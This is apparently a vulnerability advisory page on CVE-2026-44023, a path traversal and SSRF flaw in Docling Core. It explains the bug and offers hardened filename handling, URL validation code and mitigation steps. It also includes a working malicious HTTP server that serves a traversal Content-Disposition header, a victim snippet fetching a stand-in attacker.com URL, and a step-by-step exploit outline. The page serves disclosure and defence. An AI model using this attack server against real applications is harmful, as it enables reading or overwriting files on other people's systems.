How CVE-2026-44023 Works
This high-severity Server-Side Request Forgery (SSRF) and path traversal vulnerability stems from how Docling Core versions from `1.5.0` up to, but not including, `2.74.1` handled remote resources. The core issue is the unsafe resolution of a server-provided `Content-Disposition` header.
In normal, secure operation, when a user provides a URL (e.g., `https://some-cdn.com/report.pdf`), Docling Core fetches the remote resource and saves it under a pre-defined cache directory. The vulnerable versions, however, trusted the `filename` parameter of the `Content-Disposition` header in the server's HTTP response when choosing where to save the file.
An attacker could host a malicious server that, upon being requested for a resource, responds with a crafted `Content-Disposition` header. For example, the server could respond with:
```http
HTTP/1.1 200 OK
Content-Disposition: attachment; filename="../../../../etc/passwd"
```
Instead of saving the fetched file under a safe name (such as `report.pdf`) inside the cache directory, the vulnerable Docling Core code joined the attacker-supplied name onto the cache path and resolved it, so `cache_dir/../../../../etc/passwd` normalizes to `/etc/passwd`. This can lead to two primary scenarios:
1. SSRF & Information Disclosure: because the library hands the traversed path back to the caller, an application that then opens and processes the "downloaded" file reads a file outside the intended cache directory, such as `/etc/passwd` or application configuration files, and may expose its contents to the attacker.
2. Arbitrary File Write: where the process has write permission to the target location, the attacker-served response body is written to an attacker-chosen path on the server's file system, which can be a stepping stone for more severe attacks such as Remote Code Execution (RCE).
The vulnerability is rated high severity because an unauthenticated, remote attacker can bypass the cache directory restriction entirely, simply by supplying a maliciously crafted URL to an application that uses the Docling Core library.
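The unsafe resolution described above, shown as a vulnerable destination-path routine beside a hardened one. This is an added illustration written for this page, not code from Docling Core: the `CACHE_DIR` location, the function names and the `download.bin` fallback are assumptions, and the header is parsed with the standard library's `email.message.Message`, which is one common way to read a `Content-Disposition` `filename` parameter in Python. The hardened version goes slightly beyond the `../` case in the text: it also discards Windows-style `..\` components, bare `..` names and leading dots, and verifies containment on the resolved path as a second line of defence.

```python
import os
import re
from email.message import Message
from pathlib import Path

# Hypothetical cache location (assumption for this example).
CACHE_DIR = Path("/var/cache/docling")

# Characters permitted in a cache file name; everything else is replaced.
SAFE_NAME = re.compile(r"[^A-Za-z0-9._-]")


def filename_from_content_disposition(header_value):
    """Return the filename parameter of a Content-Disposition value, or None."""
    msg = Message()
    msg["Content-Disposition"] = header_value
    return msg.get_filename()


def vulnerable_destination(header_value, fallback="download.bin"):
    """The unsafe pattern: trust the server's filename and join it onto the cache dir.

    A name such as "../../../../etc/passwd" normalizes to "/etc/passwd".
    """
    name = filename_from_content_disposition(header_value) or fallback
    return os.path.normpath(os.path.join(str(CACHE_DIR), name))


def safe_destination(header_value, fallback="download.bin"):
    """The hardened pattern: reduce the name to a single safe component and
    verify the resolved path is still inside the cache directory."""
    raw = filename_from_content_disposition(header_value) or fallback
    # Keep only the last path component; treat both POSIX and Windows separators.
    base = raw.replace("\\", "/").rsplit("/", 1)[-1]
    # Drop unexpected characters and leading dots ("..", ".hidden").
    base = SAFE_NAME.sub("_", base).lstrip(".")
    if not base:
        base = fallback
    candidate = (CACHE_DIR / base).resolve()
    # Containment check on the resolved path (also catches a pre-planted symlink).
    if CACHE_DIR.resolve() not in candidate.parents:
        raise ValueError(f"refusing to write outside cache dir: {candidate}")
    return candidate


if __name__ == "__main__":
    evil = 'attachment; filename="../../../../etc/passwd"'
    print("vulnerable:", vulnerable_destination(evil))  # /etc/passwd
    print("hardened:  ", safe_destination(evil))        # <cache>/passwd
```

Reducing the name to its last component is what actually closes the hole; the containment check is cheap insurance against a future change that reintroduces a path join, and it also fails closed if the cache entry is a symlink pointing elsewhere.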
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Docling Core
Version: 1.5.0 up to (not including) 2.74.1
Vulnerability: Path Traversal / SSRF
Severity: High
Date: June 2, 2026
<h2 style="color: blue;">Prediction: July 2, 2026</h2>
<h2 style="color: blue;">What Undercode Say</h2>
Undercode's analytics indicate the primary attack vector is user-supplied URLs that are processed by Docling Core. Here is a simulation of the attack flow:
1. Attacker sets up a simple HTTP server
Save the following as `malicious_server.py`:
```python
from http.server import HTTPServer, BaseHTTPRequestHandler


class MaliciousHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        # The malicious Content-Disposition header: a traversal sequence in the filename parameter
        self.send_header('Content-Disposition', 'attachment; filename="../../../../etc/passwd"')
        self.send_header('Content-Type', 'application/octet-stream')
        self.end_headers()
        # Response body mimicking part of /etc/passwd
        self.wfile.write(b'root:x:0:0:root:/root:/bin/bash')


if __name__ == '__main__':
    server = HTTPServer(('localhost', 8080), MaliciousHandler)
    print("Malicious server running on port 8080...")
    server.serve_forever()
```
Run the malicious server:
```bash
python3 malicious_server.py
```
2. Victim application uses vulnerable Docling Core to fetch the attacker's URL
A sample Python function that would be vulnerable (the fetch function name is hypothetical; the real API name is not given here):
```python
from docling_core import some_fetch_function  # hypothetical vulnerable function


def process_user_document(user_provided_url):
    # In docling-core >= 1.5.0 and < 2.74.1 the fetch honours the server-supplied
    # Content-Disposition filename, so the returned path can escape the cache directory
    local_file_path = some_fetch_function(user_provided_url)
    # The returned 'local_file_path' could be '/etc/passwd'
    # The application then reads or processes that file
    with open(local_file_path, 'r') as f:
        return f.read()


# The attacker's URL triggers the path traversal
result = process_user_document("http://attacker.com:8080/malicious")
```
<h2 style="color: blue;">How to Exploit</h2>
To exploit this vulnerability, an attacker only needs to supply a URL pointing to a server they control. The exploitation steps are:
1. Server Setup: The attacker hosts a simple HTTP server.
2. Craft Response: The server is configured to respond to any request with a `Content-Disposition` header containing a path traversal sequence (e.g., `filename="../../../sensitive/file"`).
3. Trigger: The attacker provides this malicious URL to the target application (e.g., as an input field, API parameter, or document link).
4. Successful Exploitation: The vulnerable Docling Core instance fetches the URL, honors the malicious `Content-Disposition` header, and attempts to read or write to the attacker-specified path on the server's local file system.
<h2 style="color: blue;">Protection from this CVE</h2>
Immediate Upgrade (Primary Fix): The only definitive mitigation is to upgrade to Docling Core version 2.74.1 or later. This version implements stricter validation of the download destination and normalizes server-provided filenames before use.
Input Validation: If upgrading is not immediately possible, strictly validate and sanitize any user-supplied URL. Reject URLs whose host is an internal or loopback address (e.g., 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, and the 169.254.169.254 cloud metadata address) and URLs using any scheme other than HTTP/HTTPS.
Network Segmentation: Apply strict egress filtering from the application environment to prevent it from accessing sensitive internal network resources or making arbitrary outbound requests.
Disable Unnecessary Features: As a temporary workaround, avoid processing any remote URLs if the feature is not strictly necessary for your application's core functionality.
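A URL pre-check for the input-validation step above, as an added example that is not part of the original page or of Docling Core. It rejects non-HTTP(S) schemes, credentials embedded in the URL, and any host that is (or resolves to) a loopback, private, link-local, multicast, reserved or unspecified address, which covers the 169.254.169.254 cloud metadata endpoint. The `resolver` parameter is an assumption made so the check can be exercised without live DNS; by default it uses `socket.getaddrinfo`.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def default_resolver(host):
    """Resolve a hostname to all of its IPv4 and IPv6 addresses."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_internal(ip):
    """True for addresses a document fetcher should never be allowed to reach."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_remote_url(url, resolver=default_resolver):
    """Return url unchanged if it is an acceptable remote target, else raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname  # brackets stripped for IPv6 literals, lower-cased
    if not host:
        raise ValueError("URL has no host")
    if parts.username or parts.password:
        raise ValueError("credentials in URL are not allowed")
    try:
        # IP literal: no DNS needed.
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        # Hostname: check every address it resolves to, not just the first.
        addrs = [ipaddress.ip_address(a) for a in resolver(host)]
    for ip in addrs:
        if is_internal(ip):
            raise ValueError(f"{host} resolves to internal address {ip}")
    return url


if __name__ == "__main__":
    # Constructed sample inputs; the resolver here is a stand-in for DNS.
    public = lambda h: ["93.184.216.34"]
    print(validate_remote_url("https://example.com/report.pdf", resolver=public))
    for bad in ("http://127.0.0.1:8080/malicious", "http://[::1]/x", "file:///etc/passwd"):
        try:
            validate_remote_url(bad)
        except ValueError as exc:
            print("rejected:", exc)
```

One caveat a practitioner should keep in mind: a name validated here can resolve differently a moment later (DNS rebinding), and an HTTP redirect can point the fetch at an internal host after the check passed. Pin the validated IP in the HTTP client (or re-validate on every connect and on every redirect hop) and keep the egress filtering from the previous step in place; this check reduces exposure but does not replace network controls.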
<h2 style="color: blue;">Impact</h2>
The impact of this vulnerability is primarily the disclosure of sensitive local files and the potential for Server-Side Request Forgery (SSRF). An attacker could read configuration files, source code, user data, or system files (like `/etc/shadow`), or reach cloud metadata endpoints. In certain scenarios it could be chained with other weaknesses to achieve arbitrary file write, leading to full remote code execution. The vulnerability affects any application that uses the `docling-core` library to fetch and process URLs from untrusted sources.
Sources:
Reported By: github.com